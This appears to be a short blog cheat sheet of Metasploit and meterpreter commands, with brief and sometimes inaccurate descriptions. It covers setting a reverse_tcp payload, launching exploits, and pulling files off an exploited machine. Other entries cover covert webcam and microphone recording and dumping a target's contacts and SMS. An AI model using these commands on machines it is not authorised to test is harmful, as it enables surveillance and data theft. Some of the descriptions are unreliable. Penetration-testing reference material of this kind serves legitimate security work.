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Dec 5, 2020

The Metasploit Project is a computer security project that provides information aboutsecurity vulnerabilities and aids in penetration testing and IDS signaturedevelopment. Metasploit Framework, is a tool for developing and executing exploit code against a remote target machine.

The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
Welcome today we have put a list of useful commands for Metasploit to help you get familiar with commands that are most used in Metasploit Framework.
Alternatively take a look Msfvenom and metasploit help manuals.

  • Webcam list (“List available webcams on target machine.”)
  • set payload windows/meterpreter/reverse_tcp (“Sets a reverse_tcp meterpreter session.”
  • Msfvenom -h (“list help options”)
  • Run webcam -p /var/www/ (“Stream webcam to /var/www.”)
  • Run webcam -s (“Stops webcam recording.”)
  • Mic -d 1 (“Record microphone default: 1 seconds.”)
    • Lpwd (“Local Print Working Directory”) prints local working directory.
  • Ls (This command shows the current working directory and detailed list of files within the current working directory.)
  • Cat (Displays Contents of a File)
  • Cd (Change Directory)
  • Edit (Downloads a copy of a file to temp files folder and opens it with the default text editor.)
  • Download file (“Download a file from the exploit machine to the attacker machine.”)
  • Download -r Documents (“Download a Directory from the exploited to the attacker machine”.)
  • Upload file (“Upload a file from the attacker to the exploit machine”.)
  • Upload -r Directory (“Upload a directory from the attacker to exploit machine”.)
  • Getlwd (Show working directory on local machine.)
  • Getwd (“Print working directory” on exploited machine.)
  • Info (“list information about targets, exploits, module author.”)
  • Printwd (“Print working directory” on exploited machine.)
  • Lcd (“Local Change Directory” – change local directory.)
  • Lpwd (“Local Print Working Directory”.)
  • Getlwd (“Get Local Working Directory”.)
  • Ls (“List Files & directories in a detailed list in current working directory.”)
  • Mkdir (“Make Directory”) Creates a new directory on the target machine.”)
  • Back (“retrieve information about an exploit.”)
  • Help (“display possible exploit commands.”)
  • check (“check to see if a target is vulnerable”)
  • Exploit (“launch a exploit attempt.”)
  • Search (“search module database.”)
  • Help search (“search for modules using keywords.”)
  • Show (“show you the available parameters for an exploit.”)
  • Show payloads (“list of available payloads.”)
  • Show targets (“return a list of operating systems which are vulnerable to the selected exploit.”)
  • Record_mic (“Record Microphone MsfVenom”)
  • webcam_snap (“Take a snapshot from webcam.”)
  • Webcam_stream (“Stream Webcam From Target Machine.”)
  • Dump_contacts (“Dump Targets Contact List to attackers machine.”)
  • Dump_sms (“Dump SMS Messages to attackers machines.”)
  • Geolocate (“Geolocate targets device.”)
  • Sessions -i (“list avalible sessions.”)
  • Sessions -i 1 (“Connect to an available session”.)
  • Ping (“Check if host is alive”.)
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